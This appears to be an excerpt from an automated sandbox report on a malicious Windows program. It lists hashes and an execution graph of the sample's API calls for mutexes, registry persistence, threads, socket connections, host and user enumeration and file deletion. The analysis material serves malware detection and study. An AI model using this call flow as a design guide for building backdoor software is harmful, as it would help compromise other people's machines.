                              • Instruction ID: cd114591026e7a104e81c72519a1eab91b6040ea3802c7004a7b12f5e9b5fbb6
                              • Opcode Fuzzy Hash: a19520de18deffc78d9f90f02973abcd7e40ba1c72beea23ddbb147ee1c1fc0c
                              • Instruction Fuzzy Hash: A601D430A0E28D8FE7229B90D8B06F9B7B5EF46304F060276D805D71EADA7C6758D751
                              Memory Dump Source
                              • Source File: 00000003.00000002.1849854443.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6d949db7786643d8251354317ae55d2a0798569968cbaf4ba1f43e767c2b5542
                              • Instruction ID: 2e770313e094848edbfe52246fde5aba9e48acd1d45fd83c4d5437fdc576c6ef
                              • Opcode Fuzzy Hash: 6d949db7786643d8251354317ae55d2a0798569968cbaf4ba1f43e767c2b5542
                              • Instruction Fuzzy Hash: 8301D431E1EA8D9FE7719B90C824BFA77B4EB46310F0541BAD025D71E6DE7C66088741

                              Execution Graph

                              Execution Coverage:4.4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:5.4%
                              Total number of Nodes:1449
                              Total number of Limit Nodes:68
                              execution_graph 46653 434887 46654 434893 ___DestructExceptionObject 46653->46654 46680 434596 46654->46680 46656 43489a 46658 4348c3 46656->46658 46978 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46656->46978 46666 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46658->46666 46979 444251 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 46658->46979 46660 4348dc 46662 4348e2 ___DestructExceptionObject 46660->46662 46980 4441f5 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 46660->46980 46663 434962 46691 434b14 46663->46691 46666->46663 46981 4433e7 36 API calls 5 library calls 46666->46981 46673 434984 46674 43498e 46673->46674 46983 44341f 28 API calls _abort 46673->46983 46676 434997 46674->46676 46984 4433c2 28 API calls _abort 46674->46984 46985 43470d 13 API calls 2 library calls 46676->46985 46679 43499f 46679->46662 46681 43459f 46680->46681 46986 434c52 IsProcessorFeaturePresent 46681->46986 46683 4345ab 46987 438f31 10 API calls 4 library calls 46683->46987 46685 4345b4 46685->46656 46686 4345b0 46686->46685 46988 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46686->46988 46688 4345bd 46689 4345cb 46688->46689 46989 438f5a 8 API calls 3 library calls 46688->46989 46689->46656 46990 436e90 46691->46990 46694 434968 46695 4441a2 46694->46695 46992 44f059 46695->46992 46697 4441ab 46699 434971 46697->46699 46996 446815 36 API calls 46697->46996 46700 40e9c5 46699->46700 46998 41cb50 LoadLibraryA GetProcAddress 46700->46998 46702 40e9e1 GetModuleFileNameW 47003 40f3c3 46702->47003 46704 40e9fd 47018 4020f6 46704->47018 46707 4020f6 28 API calls 46708 40ea1b 46707->46708 47024 41be1b 46708->47024 46712 40ea2d 47050 401e8d 46712->47050 46714 40ea36 46715 40ea93 46714->46715 46716 40ea49 46714->46716 47056 401e65 46715->47056 47324 40fbb3 97 API calls 46716->47324 46719 40eaa3 46723 401e65 22 API calls 46719->46723 46720 40ea5b 46721 401e65 22 API calls 46720->46721 46722 40ea67 46721->46722 47325 410f37 36 API calls __EH_prolog 46722->47325 46724 40eac2 46723->46724 47061 40531e 46724->47061 46727 40ead1 47066 406383 46727->47066 46728 40ea79 47326 40fb64 78 API calls 46728->47326 46732 40ea82 47327 40f3b0 71 API calls 46732->47327 46737 401fd8 11 API calls 46740 40eefb 46737->46740 46739 401fd8 11 API calls 46741 40eafb 46739->46741 46982 4432f6 GetModuleHandleW 46740->46982 46742 401e65 22 API calls 46741->46742 46743 40eb04 46742->46743 47083 401fc0 46743->47083 46745 40eb0f 46746 401e65 22 API calls 46745->46746 46747 40eb28 46746->46747 46748 401e65 22 API calls 46747->46748 46749 40eb43 46748->46749 46750 40ebae 46749->46750 47328 406c1e 46749->47328 46752 401e65 22 API calls 46750->46752 46757 40ebbb 46752->46757 46753 40eb70 46754 401fe2 28 API calls 46753->46754 46755 40eb7c 46754->46755 46758 401fd8 11 API calls 46755->46758 46756 40ec02 47087 40d069 46756->47087 46757->46756 46762 413549 3 API calls 46757->46762 46759 40eb85 46758->46759 47333 413549 RegOpenKeyExA 46759->47333 46761 40ec08 46763 40ea8b 46761->46763 47090 41b2c3 46761->47090 46769 40ebe6 46762->46769 46763->46737 46767 40ec23 46770 40ec76 46767->46770 47107 407716 46767->47107 46768 40f34f 47416 4139a9 30 API calls 46768->47416 46769->46756 47336 4139a9 30 API calls 46769->47336 46772 401e65 22 API calls 46770->46772 46775 40ec7f 46772->46775 46785 40ec90 46775->46785 46786 40ec8b 46775->46786 46777 40f365 47417 412475 65 API calls ___scrt_fastfail 46777->47417 46779 40ec42 47337 407738 30 API calls 46779->47337 46780 40ec4c 46781 401e65 22 API calls 46780->46781 46794 40ec55 46781->46794 46782 40f36f 46784 41bc5e 28 API calls 46782->46784 46789 40f37f 46784->46789 46788 401e65 22 API calls 46785->46788 47340 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46786->47340 46787 40ec47 47338 407260 98 API calls 46787->47338 46792 40ec99 46788->46792 47216 413a23 RegOpenKeyExW 46789->47216 47111 41bc5e 46792->47111 46794->46770 46798 40ec71 46794->46798 46795 40eca4 47115 401f13 46795->47115 47339 407260 98 API calls 46798->47339 46802 401f09 11 API calls 46804 40f39c 46802->46804 46806 401f09 11 API calls 46804->46806 46808 40f3a5 46806->46808 46807 401e65 22 API calls 46809 40ecc1 46807->46809 47219 40dd42 46808->47219 46813 401e65 22 API calls 46809->46813 46815 40ecdb 46813->46815 46814 40f3af 46816 401e65 22 API calls 46815->46816 46817 40ecf5 46816->46817 46818 401e65 22 API calls 46817->46818 46820 40ed0e 46818->46820 46819 40ed7b 46822 40ed8a 46819->46822 46828 40ef06 ___scrt_fastfail 46819->46828 46820->46819 46821 401e65 22 API calls 46820->46821 46826 40ed23 _wcslen 46821->46826 46823 40ed93 46822->46823 46851 40ee0f ___scrt_fastfail 46822->46851 46824 401e65 22 API calls 46823->46824 46825 40ed9c 46824->46825 46827 401e65 22 API calls 46825->46827 46826->46819 46829 401e65 22 API calls 46826->46829 46830 40edae 46827->46830 47401 4136f8 RegOpenKeyExA 46828->47401 46831 40ed3e 46829->46831 46833 401e65 22 API calls 46830->46833 46834 401e65 22 API calls 46831->46834 46835 40edc0 46833->46835 46836 40ed53 46834->46836 46839 401e65 22 API calls 46835->46839 47341 40da34 46836->47341 46837 40ef51 46838 401e65 22 API calls 46837->46838 46840 40ef76 46838->46840 46842 40ede9 46839->46842 47137 402093 46840->47137 46845 401e65 22 API calls 46842->46845 46844 401f13 28 API calls 46847 40ed72 46844->46847 46848 40edfa 46845->46848 46850 401f09 11 API calls 46847->46850 47399 40cdf9 45 API calls _wcslen 46848->47399 46849 40ef88 47143 41376f RegCreateKeyA 46849->47143 46850->46819 47127 413947 46851->47127 46855 40eea3 ctype 46860 401e65 22 API calls 46855->46860 46856 40ee0a 46856->46851 46858 401e65 22 API calls 46859 40efaa 46858->46859 47149 43baac 46859->47149 46861 40eeba 46860->46861 46861->46837 46865 40eece 46861->46865 46864 40efc1 47404 41cd9b 87 API calls ___scrt_fastfail 46864->47404 46867 401e65 22 API calls 46865->46867 46866 40efe4 46871 402093 28 API calls 46866->46871 46869 40eed7 46867->46869 46872 41bc5e 28 API calls 46869->46872 46870 40efc8 CreateThread 46870->46866 48341 41d45d 10 API calls 46870->48341 46873 40eff9 46871->46873 46874 40eee3 46872->46874 46875 402093 28 API calls 46873->46875 47400 40f474 104 API calls 46874->47400 46877 40f008 46875->46877 47153 41b4ef 46877->47153 46878 40eee8 46878->46837 46880 40eeef 46878->46880 46880->46763 46882 401e65 22 API calls 46883 40f019 46882->46883 46884 401e65 22 API calls 46883->46884 46885 40f02b 46884->46885 46886 401e65 22 API calls 46885->46886 46887 40f04b 46886->46887 46888 43baac 40 API calls 46887->46888 46889 40f058 46888->46889 46890 401e65 22 API calls 46889->46890 46891 40f063 46890->46891 46892 401e65 22 API calls 46891->46892 46893 40f074 46892->46893 46894 401e65 22 API calls 46893->46894 46895 40f089 46894->46895 46896 401e65 22 API calls 46895->46896 46897 40f09a 46896->46897 46898 40f0a1 StrToIntA 46897->46898 47177 409de4 46898->47177 46901 401e65 22 API calls 46902 40f0bc 46901->46902 46903 40f101 46902->46903 46904 40f0c8 46902->46904 46907 401e65 22 API calls 46903->46907 47405 4344ea 46904->47405 46909 40f111 46907->46909 46908 401e65 22 API calls 46910 40f0e4 46908->46910 46911 40f159 46909->46911 46912 40f11d 46909->46912 46913 40f0eb CreateThread 46910->46913 46915 401e65 22 API calls 46911->46915 46914 4344ea new 22 API calls 46912->46914 46913->46903 48339 419fb4 103 API calls __EH_prolog 46913->48339 46916 40f126 46914->46916 46917 40f162 46915->46917 46918 401e65 22 API calls 46916->46918 46920 40f1cc 46917->46920 46921 40f16e 46917->46921 46919 40f138 46918->46919 46922 40f13f CreateThread 46919->46922 46923 401e65 22 API calls 46920->46923 46924 401e65 22 API calls 46921->46924 46922->46911 48344 419fb4 103 API calls __EH_prolog 46922->48344 46925 40f1d5 46923->46925 46926 40f17e 46924->46926 46927 40f1e1 46925->46927 46928 40f21a 46925->46928 46929 401e65 22 API calls 46926->46929 46930 401e65 22 API calls 46927->46930 47202 41b60d GetComputerNameExW GetUserNameW 46928->47202 46931 40f193 46929->46931 46933 40f1ea 46930->46933 47412 40d9e8 31 API calls 46931->47412 46939 401e65 22 API calls 46933->46939 46935 401f13 28 API calls 46936 40f22e 46935->46936 46938 401f09 11 API calls 46936->46938 46941 40f237 46938->46941 46942 40f1ff 46939->46942 46940 40f1a6 46943 401f13 28 API calls 46940->46943 46944 40f240 SetProcessDEPPolicy 46941->46944 46945 40f243 CreateThread 46941->46945 46952 43baac 40 API calls 46942->46952 46946 40f1b2 46943->46946 46944->46945 46947 40f264 46945->46947 46948 40f258 CreateThread 46945->46948 48312 40f7a7 46945->48312 46949 401f09 11 API calls 46946->46949 46950 40f279 46947->46950 46951 40f26d CreateThread 46947->46951 46948->46947 48340 4120f7 138 API calls 46948->48340 46953 40f1bb CreateThread 46949->46953 46955 40f2cc 46950->46955 46957 402093 28 API calls 46950->46957 46951->46950 48342 4126db 38 API calls ___scrt_fastfail 46951->48342 46954 40f20c 46952->46954 46953->46920 48343 401be9 50 API calls 46953->48343 47413 40c162 7 API calls 46954->47413 47213 4134ff RegOpenKeyExA 46955->47213 46958 40f29c 46957->46958 47414 4052fd 28 API calls 46958->47414 46964 40f2ed 46966 41bc5e 28 API calls 46964->46966 46968 40f2fd 46966->46968 47415 41361b 31 API calls 46968->47415 46972 40f313 46973 401f09 11 API calls 46972->46973 46976 40f31e 46973->46976 46974 40f346 DeleteFileW 46975 40f34d 46974->46975 46974->46976 46975->46782 46976->46782 46976->46974 46977 40f334 Sleep 46976->46977 46977->46976 46978->46656 46979->46660 46980->46666 46981->46663 46982->46673 46983->46674 46984->46676 46985->46679 46986->46683 46987->46686 46988->46688 46989->46685 46991 434b27 GetStartupInfoW 46990->46991 46991->46694 46993 44f06b 46992->46993 46994 44f062 46992->46994 46993->46697 46997 44ef58 49 API calls 4 library calls 46994->46997 46996->46697 46997->46993 46999 41cb8f LoadLibraryA GetProcAddress 46998->46999 47000 41cb7f GetModuleHandleA GetProcAddress 46998->47000 47001 41cbb8 44 API calls 46999->47001 47002 41cba8 LoadLibraryA GetProcAddress 46999->47002 47000->46999 47001->46702 47002->47001 47418 41b4a8 FindResourceA 47003->47418 47007 40f3ed _Yarn 47428 4020b7 47007->47428 47010 401fe2 28 API calls 47011 40f413 47010->47011 47012 401fd8 11 API calls 47011->47012 47013 40f41c 47012->47013 47014 43bd51 new 21 API calls 47013->47014 47015 40f42d _Yarn 47014->47015 47434 406dd8 47015->47434 47017 40f460 47017->46704 47019 40210c 47018->47019 47020 4023ce 11 API calls 47019->47020 47021 402126 47020->47021 47022 402569 28 API calls 47021->47022 47023 402134 47022->47023 47023->46707 47488 4020df 47024->47488 47026 41be9e 47027 401fd8 11 API calls 47026->47027 47028 41bed0 47027->47028 47030 401fd8 11 API calls 47028->47030 47029 41bea0 47032 4041a2 28 API calls 47029->47032 47031 41bed8 47030->47031 47034 401fd8 11 API calls 47031->47034 47035 41beac 47032->47035 47036 40ea24 47034->47036 47037 401fe2 28 API calls 47035->47037 47046 40fb17 47036->47046 47039 41beb5 47037->47039 47038 401fe2 28 API calls 47045 41be2e 47038->47045 47040 401fd8 11 API calls 47039->47040 47042 41bebd 47040->47042 47041 401fd8 11 API calls 47041->47045 47043 41ce34 28 API calls 47042->47043 47043->47026 47045->47026 47045->47029 47045->47038 47045->47041 47492 4041a2 47045->47492 47495 41ce34 47045->47495 47047 40fb23 47046->47047 47049 40fb2a 47046->47049 47537 402163 11 API calls 47047->47537 47049->46712 47051 402163 47050->47051 47055 40219f 47051->47055 47538 402730 11 API calls 47051->47538 47053 402184 47539 402712 11 API calls std::_Deallocate 47053->47539 47055->46714 47057 401e6d 47056->47057 47058 401e75 47057->47058 47540 402158 22 API calls 47057->47540 47058->46719 47062 4020df 11 API calls 47061->47062 47063 40532a 47062->47063 47541 4032a0 47063->47541 47065 405346 47065->46727 47545 4051ef 47066->47545 47068 406391 47549 402055 47068->47549 47071 401fe2 47072 401ff1 47071->47072 47079 402039 47071->47079 47073 4023ce 11 API calls 47072->47073 47074 401ffa 47073->47074 47075 40203c 47074->47075 47077 402015 47074->47077 47076 40267a 11 API calls 47075->47076 47076->47079 47581 403098 28 API calls 47077->47581 47080 401fd8 47079->47080 47081 4023ce 11 API calls 47080->47081 47082 401fe1 47081->47082 47082->46739 47084 401fd2 47083->47084 47085 401fc9 47083->47085 47084->46745 47582 4025e0 28 API calls 47085->47582 47583 401fab 47087->47583 47089 40d073 CreateMutexA GetLastError 47089->46761 47584 41bfb7 47090->47584 47095 401fe2 28 API calls 47096 41b2ff 47095->47096 47097 401fd8 11 API calls 47096->47097 47099 41b307 47097->47099 47098 41b35d 47098->46767 47099->47098 47100 4135a6 31 API calls 47099->47100 47101 41b330 47100->47101 47102 41b33b StrToIntA 47101->47102 47103 41b352 47102->47103 47104 41b349 47102->47104 47106 401fd8 11 API calls 47103->47106 47592 41cf69 22 API calls 47104->47592 47106->47098 47108 40772a 47107->47108 47109 413549 3 API calls 47108->47109 47110 407731 47109->47110 47110->46779 47110->46780 47112 41bc72 47111->47112 47593 40b904 47112->47593 47114 41bc7a 47114->46795 47116 401f22 47115->47116 47117 401f6a 47115->47117 47118 402252 11 API calls 47116->47118 47124 401f09 47117->47124 47119 401f2b 47118->47119 47120 401f6d 47119->47120 47121 401f46 47119->47121 47626 402336 47120->47626 47625 40305c 28 API calls 47121->47625 47125 402252 11 API calls 47124->47125 47126 401f12 47125->47126 47126->46807 47128 413965 47127->47128 47129 406dd8 28 API calls 47128->47129 47130 41397a 47129->47130 47131 4020f6 28 API calls 47130->47131 47132 41398a 47131->47132 47133 41376f 14 API calls 47132->47133 47134 413994 47133->47134 47135 401fd8 11 API calls 47134->47135 47136 4139a1 47135->47136 47136->46855 47138 40209b 47137->47138 47139 4023ce 11 API calls 47138->47139 47140 4020a6 47139->47140 47630 4024ed 47140->47630 47144 4137bf 47143->47144 47146 413788 47143->47146 47145 401fd8 11 API calls 47144->47145 47147 40ef9e 47145->47147 47148 41379a RegSetValueExA RegCloseKey 47146->47148 47147->46858 47148->47144 47150 43bac5 _swprintf 47149->47150 47634 43ae03 47150->47634 47152 40efb7 47152->46864 47152->46866 47154 41b5a0 47153->47154 47155 41b505 GetLocalTime 47153->47155 47157 401fd8 11 API calls 47154->47157 47156 40531e 28 API calls 47155->47156 47158 41b547 47156->47158 47159 41b5a8 47157->47159 47160 406383 28 API calls 47158->47160 47161 401fd8 11 API calls 47159->47161 47163 41b553 47160->47163 47162 40f00d 47161->47162 47162->46882 47662 402f10 47163->47662 47166 406383 28 API calls 47167 41b56b 47166->47167 47667 407200 77 API calls 47167->47667 47169 41b579 47170 401fd8 11 API calls 47169->47170 47171 41b585 47170->47171 47172 401fd8 11 API calls 47171->47172 47173 41b58e 47172->47173 47174 401fd8 11 API calls 47173->47174 47175 41b597 47174->47175 47176 401fd8 11 API calls 47175->47176 47176->47154 47178 409e02 _wcslen 47177->47178 47179 409e24 47178->47179 47180 409e0d 47178->47180 47182 40da34 31 API calls 47179->47182 47181 40da34 31 API calls 47180->47181 47183 409e15 47181->47183 47184 409e2c 47182->47184 47185 401f13 28 API calls 47183->47185 47186 401f13 28 API calls 47184->47186 47187 409e1f 47185->47187 47188 409e3a 47186->47188 47190 401f09 11 API calls 47187->47190 47189 401f09 11 API calls 47188->47189 47191 409e42 47189->47191 47192 409e79 47190->47192 47686 40915b 28 API calls 47191->47686 47671 40a109 47192->47671 47195 409e54 47687 403014 47195->47687 47199 401f13 28 API calls 47200 409e69 47199->47200 47201 401f09 11 API calls 47200->47201 47201->47187 47891 40417e 47202->47891 47207 403014 28 API calls 47208 41b672 47207->47208 47209 401f09 11 API calls 47208->47209 47210 41b67b 47209->47210 47211 401f09 11 API calls 47210->47211 47212 40f223 47211->47212 47212->46935 47214 413520 RegQueryValueExA RegCloseKey 47213->47214 47215 40f2e4 47213->47215 47214->47215 47215->46808 47215->46964 47217 40f392 47216->47217 47218 413a3f RegDeleteValueW 47216->47218 47217->46802 47218->47217 47220 40dd5b 47219->47220 47221 4134ff 3 API calls 47220->47221 47222 40dd62 47221->47222 47223 40dd81 47222->47223 47985 401707 47222->47985 47227 414f2a 47223->47227 47225 40dd6f 47988 413877 RegCreateKeyA 47225->47988 47228 4020df 11 API calls 47227->47228 47229 414f3e 47228->47229 48002 41b8b3 47229->48002 47232 4020df 11 API calls 47233 414f54 47232->47233 47234 401e65 22 API calls 47233->47234 47235 414f62 47234->47235 47236 43baac 40 API calls 47235->47236 47237 414f6f 47236->47237 47238 414f81 47237->47238 47239 414f74 Sleep 47237->47239 47240 402093 28 API calls 47238->47240 47239->47238 47241 414f90 47240->47241 47242 401e65 22 API calls 47241->47242 47243 414f99 47242->47243 47244 4020f6 28 API calls 47243->47244 47245 414fa4 47244->47245 47246 41be1b 28 API calls 47245->47246 47247 414fac 47246->47247 48006 40489e WSAStartup 47247->48006 47249 414fb6 47250 401e65 22 API calls 47249->47250 47251 414fbf 47250->47251 47252 401e65 22 API calls 47251->47252 47300 41503e 47251->47300 47253 414fd8 47252->47253 47254 401e65 22 API calls 47253->47254 47256 414fe9 47254->47256 47255 4020f6 28 API calls 47255->47300 47258 401e65 22 API calls 47256->47258 47257 41be1b 28 API calls 47257->47300 47259 414ffa 47258->47259 47261 401e65 22 API calls 47259->47261 47260 406c1e 28 API calls 47260->47300 47262 41500b 47261->47262 47264 401e65 22 API calls 47262->47264 47263 401fe2 28 API calls 47263->47300 47265 41501c 47264->47265 47266 401e65 22 API calls 47265->47266 47267 41502e 47266->47267 48143 40473d 89 API calls 47267->48143 47269 41b4ef 80 API calls 47269->47300 47271 41518c WSAGetLastError 48144 41cae1 30 API calls 47271->48144 47276 41519c 47278 41b4ef 80 API calls 47276->47278 47282 401e65 22 API calls 47276->47282 47283 401e8d 11 API calls 47276->47283 47284 43baac 40 API calls 47276->47284 47276->47300 47320 402093 28 API calls 47276->47320 47321 415a71 CreateThread 47276->47321 47322 401fd8 11 API calls 47276->47322 47323 401f09 11 API calls 47276->47323 48145 4052fd 28 API calls 47276->48145 48147 40b051 85 API calls 47276->48147 48148 404e26 99 API calls 47276->48148 47278->47276 47280 401e65 22 API calls 47280->47300 47281 40531e 28 API calls 47281->47300 47282->47276 47283->47276 47286 415acf Sleep 47284->47286 47285 406383 28 API calls 47285->47300 47286->47276 47287 402f10 28 API calls 47287->47300 47288 402093 28 API calls 47288->47300 47289 401fd8 11 API calls 47289->47300 47292 40905c 28 API calls 47292->47300 47293 441e81 20 API calls 47293->47300 47294 4136f8 3 API calls 47294->47300 47295 4135a6 31 API calls 47295->47300 47296 40417e 28 API calls 47296->47300 47300->47255 47300->47257 47300->47260 47300->47263 47300->47269 47300->47271 47300->47276 47300->47280 47300->47281 47300->47285 47300->47287 47300->47288 47300->47289 47300->47292 47300->47293 47300->47294 47300->47295 47300->47296 47301 41bb8e 28 API calls 47300->47301 47302 401e65 22 API calls 47300->47302 48007 414ee9 47300->48007 48012 40482d 47300->48012 48019 404f51 47300->48019 48034 4048c8 connect 47300->48034 48094 41b7e0 47300->48094 48097 4145bd 47300->48097 48100 40dd89 47300->48100 48106 41bc42 47300->48106 48109 41bd1e 47300->48109 47301->47300 47303 415439 GetTickCount 47302->47303 47304 41bb8e 28 API calls 47303->47304 47316 415456 47304->47316 47306 41bb8e 28 API calls 47306->47316 47308 41bd1e 28 API calls 47308->47316 47311 406383 28 API calls 47311->47316 47312 402ea1 28 API calls 47312->47316 47313 402f10 28 API calls 47313->47316 47315 401fd8 11 API calls 47315->47316 47316->47306 47316->47308 47316->47311 47316->47312 47316->47313 47316->47315 47317 401f09 11 API calls 47316->47317 48113 41bae6 47316->48113 48115 41ba96 47316->48115 48120 40f8d1 GetLocaleInfoA 47316->48120 48123 402f31 28 API calls 47316->48123 48124 404c10 47316->48124 48146 404aa1 61 API calls _Yarn 47316->48146 47317->47316 47320->47276 47321->47276 48302 41ad17 105 API calls 47321->48302 47322->47276 47323->47276 47324->46720 47325->46728 47326->46732 47329 4020df 11 API calls 47328->47329 47330 406c2a 47329->47330 47331 4032a0 28 API calls 47330->47331 47332 406c47 47331->47332 47332->46753 47334 40eba4 47333->47334 47335 413573 RegQueryValueExA RegCloseKey 47333->47335 47334->46750 47334->46768 47335->47334 47336->46756 47337->46787 47338->46780 47339->46770 47340->46785 47342 401f86 11 API calls 47341->47342 47343 40da50 47342->47343 47344 40da70 47343->47344 47345 40daa5 47343->47345 47346 40da66 47343->47346 48303 41b5b4 29 API calls 47344->48303 47349 41bfb7 GetCurrentProcess 47345->47349 47348 40db99 GetLongPathNameW 47346->47348 47352 40417e 28 API calls 47348->47352 47350 40daaa 47349->47350 47353 40db00 47350->47353 47354 40daae 47350->47354 47351 40da79 47355 401f13 28 API calls 47351->47355 47356 40dbae 47352->47356 47357 40417e 28 API calls 47353->47357 47358 40417e 28 API calls 47354->47358 47394 40da83 47355->47394 47359 40417e 28 API calls 47356->47359 47361 40db0e 47357->47361 47362 40dabc 47358->47362 47360 40dbbd 47359->47360 48306 40ddd1 28 API calls 47360->48306 47367 40417e 28 API calls 47361->47367 47368 40417e 28 API calls 47362->47368 47364 401f09 11 API calls 47364->47346 47365 40dbd0 48307 402fa5 28 API calls 47365->48307 47370 40db24 47367->47370 47371 40dad2 47368->47371 47369 40dbdb 48308 402fa5 28 API calls 47369->48308 48305 402fa5 28 API calls 47370->48305 48304 402fa5 28 API calls 47371->48304 47375 40dbe5 47378 401f09 11 API calls 47375->47378 47376 40db2f 47379 401f13 28 API calls 47376->47379 47377 40dadd 47380 401f13 28 API calls 47377->47380 47381 40dbef 47378->47381 47382 40db3a 47379->47382 47383 40dae8 47380->47383 47384 401f09 11 API calls 47381->47384 47385 401f09 11 API calls 47382->47385 47386 401f09 11 API calls 47383->47386 47387 40dbf8 47384->47387 47388 40db43 47385->47388 47389 40daf1 47386->47389 47390 401f09 11 API calls 47387->47390 47391 401f09 11 API calls 47388->47391 47392 401f09 11 API calls 47389->47392 47393 40dc01 47390->47393 47391->47394 47392->47394 47395 401f09 11 API calls 47393->47395 47394->47364 47396 40dc0a 47395->47396 47397 401f09 11 API calls 47396->47397 47398 40dc13 47397->47398 47398->46844 47399->46856 47400->46878 47402 413742 47401->47402 47403 41371e RegQueryValueExA RegCloseKey 47401->47403 47402->46837 47403->47402 47404->46870 47407 4344ef 47405->47407 47406 43bd51 new 21 API calls 47406->47407 47407->47406 47408 40f0d1 47407->47408 48309 442f80 7 API calls 2 library calls 47407->48309 48310 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47407->48310 48311 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47407->48311 47408->46908 47412->46940 47413->46928 47415->46972 47416->46777 47419 41b4c5 LoadResource LockResource SizeofResource 47418->47419 47420 40f3de 47418->47420 47419->47420 47421 43bd51 47420->47421 47423 446137 __Getctype 47421->47423 47422 446175 47438 4405dd 20 API calls _free 47422->47438 47423->47422 47425 446160 RtlAllocateHeap 47423->47425 47437 442f80 7 API calls 2 library calls 47423->47437 47425->47423 47426 446173 47425->47426 47426->47007 47429 4020bf 47428->47429 47439 4023ce 47429->47439 47431 4020ca 47443 40250a 47431->47443 47433 4020d9 47433->47010 47435 4020b7 28 API calls 47434->47435 47436 406dec 47435->47436 47436->47017 47437->47423 47438->47426 47440 402428 47439->47440 47441 4023d8 47439->47441 47440->47431 47441->47440 47450 4027a7 11 API calls std::_Deallocate 47441->47450 47444 40251a 47443->47444 47445 402520 47444->47445 47446 402535 47444->47446 47451 402569 47445->47451 47461 4028e8 47446->47461 47449 402533 47449->47433 47450->47440 47472 402888 47451->47472 47453 40257d 47454 402592 47453->47454 47455 4025a7 47453->47455 47477 402a34 22 API calls 47454->47477 47456 4028e8 28 API calls 47455->47456 47460 4025a5 47456->47460 47458 40259b 47478 4029da 22 API calls 47458->47478 47460->47449 47462 4028f1 47461->47462 47463 402953 47462->47463 47464 4028fb 47462->47464 47486 4028a4 22 API calls 47463->47486 47467 402904 47464->47467 47468 402917 47464->47468 47480 402cae 47467->47480 47470 402915 47468->47470 47471 4023ce 11 API calls 47468->47471 47470->47449 47471->47470 47473 402890 47472->47473 47474 402898 47473->47474 47479 402ca3 22 API calls 47473->47479 47474->47453 47477->47458 47478->47460 47481 402cb8 __EH_prolog 47480->47481 47487 402e54 22 API calls 47481->47487 47483 4023ce 11 API calls 47485 402d92 47483->47485 47484 402d24 47484->47483 47485->47470 47487->47484 47489 4020e7 47488->47489 47490 4023ce 11 API calls 47489->47490 47491 4020f2 47490->47491 47491->47045 47506 40423a 47492->47506 47496 41ce41 47495->47496 47497 41cea0 47496->47497 47501 41ce51 47496->47501 47498 41ceba 47497->47498 47499 41cfe0 28 API calls 47497->47499 47521 41d146 28 API calls 47498->47521 47499->47498 47502 41ce89 47501->47502 47512 41cfe0 47501->47512 47520 41d146 28 API calls 47502->47520 47503 41ce9c 47503->47045 47507 404243 47506->47507 47508 4023ce 11 API calls 47507->47508 47509 40424e 47508->47509 47510 402569 28 API calls 47509->47510 47511 4041b5 47510->47511 47511->47045 47514 41cfe8 47512->47514 47513 41d01a 47513->47502 47514->47513 47515 41d01e 47514->47515 47518 41d002 47514->47518 47532 402725 22 API calls 47515->47532 47522 41d051 47518->47522 47520->47503 47521->47503 47523 41d05b __EH_prolog 47522->47523 47533 402717 22 API calls 47523->47533 47525 41d06e 47534 41d15d 11 API calls 47525->47534 47527 41d094 47528 41d0cc 47527->47528 47535 402730 11 API calls 47527->47535 47528->47513 47530 41d0b3 47536 402712 11 API calls std::_Deallocate 47530->47536 47533->47525 47534->47527 47535->47530 47536->47528 47537->47049 47538->47053 47539->47055 47542 4032aa 47541->47542 47543 4028e8 28 API calls 47542->47543 47544 4032c9 47542->47544 47543->47544 47544->47065 47546 4051fb 47545->47546 47555 405274 47546->47555 47548 405208 47548->47068 47550 402061 47549->47550 47551 4023ce 11 API calls 47550->47551 47552 40207b 47551->47552 47577 40267a 47552->47577 47556 405282 47555->47556 47557 405288 47556->47557 47558 40529e 47556->47558 47566 4025f0 47557->47566 47559 4052f5 47558->47559 47560 4052b6 47558->47560 47575 4028a4 22 API calls 47559->47575 47562 40529c 47560->47562 47564 4028e8 28 API calls 47560->47564 47562->47548 47564->47562 47567 402888 22 API calls 47566->47567 47568 402602 47567->47568 47569 402672 47568->47569 47570 402629 47568->47570 47576 4028a4 22 API calls 47569->47576 47573 4028e8 28 API calls 47570->47573 47574 40263b 47570->47574 47573->47574 47574->47562 47578 40268b 47577->47578 47579 4023ce 11 API calls 47578->47579 47580 40208d 47579->47580 47580->47071 47581->47079 47582->47084 47585 41bfc4 GetCurrentProcess 47584->47585 47586 41b2d1 47584->47586 47585->47586 47587 4135a6 RegOpenKeyExA 47586->47587 47588 4135d4 RegQueryValueExA RegCloseKey 47587->47588 47589 4135fe 47587->47589 47588->47589 47590 402093 28 API calls 47589->47590 47591 413613 47590->47591 47591->47095 47592->47103 47594 40b90c 47593->47594 47599 402252 47594->47599 47596 40b917 47603 40b92c 47596->47603 47598 40b926 47598->47114 47600 40225c 47599->47600 47601 4022ac 47599->47601 47600->47601 47610 402779 11 API calls std::_Deallocate 47600->47610 47601->47596 47604 40b966 47603->47604 47605 40b938 47603->47605 47622 4028a4 22 API calls 47604->47622 47611 4027e6 47605->47611 47609 40b942 47609->47598 47610->47601 47612 4027ef 47611->47612 47613 402851 47612->47613 47614 4027f9 47612->47614 47624 4028a4 22 API calls 47613->47624 47617 402802 47614->47617 47618 402815 47614->47618 47623 402aea 28 API calls __EH_prolog 47617->47623 47620 402813 47618->47620 47621 402252 11 API calls 47618->47621 47620->47609 47621->47620 47623->47620 47625->47117 47627 402347 47626->47627 47628 402252 11 API calls 47627->47628 47629 4023c7 47628->47629 47629->47117 47631 4024f9 47630->47631 47632 40250a 28 API calls 47631->47632 47633 4020b1 47632->47633 47633->46849 47650 43ba0a 47634->47650 47636 43ae50 47656 43a7b7 36 API calls 3 library calls 47636->47656 47637 43ae15 47637->47636 